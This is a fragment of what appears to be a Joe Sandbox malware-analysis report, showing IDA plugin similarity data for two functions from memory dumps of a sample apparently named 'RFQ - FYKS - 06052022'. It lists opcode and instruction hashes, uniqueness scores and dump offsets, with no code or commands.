                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a90e2003be650aa545c8b1a7c18f46ee860b6644285c4ce84bdef54d27b8e7f5
                                                                                        • Instruction ID: 962e96b26cc4ac2f82679605042e8c7c4c4c77b74c47ba8d1577a7e09ec879d1
                                                                                        • Opcode Fuzzy Hash: a90e2003be650aa545c8b1a7c18f46ee860b6644285c4ce84bdef54d27b8e7f5
                                                                                        • Instruction Fuzzy Hash: AED0A7343111148FC700A718E408D9677E9EB89621B114096F905CB360CEB1EC008BC0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0578F2F8 Relevance: .0, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367207694.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5780000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: de173689722512145bd6b2f95ca1c98dec6581e191bc15ac2bfd5a47c4ff1c15
                                                                                        • Instruction ID: a8716ddf43d05694d894543ecc659b17f838158e3452e8c5a3b9ecf576b7c038
                                                                                        • Opcode Fuzzy Hash: de173689722512145bd6b2f95ca1c98dec6581e191bc15ac2bfd5a47c4ff1c15
                                                                                        • Instruction Fuzzy Hash: C5C01235405301FFEB019B60F902BA7BBA0BBA0300F10821AFD9088020CB30A020EF11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%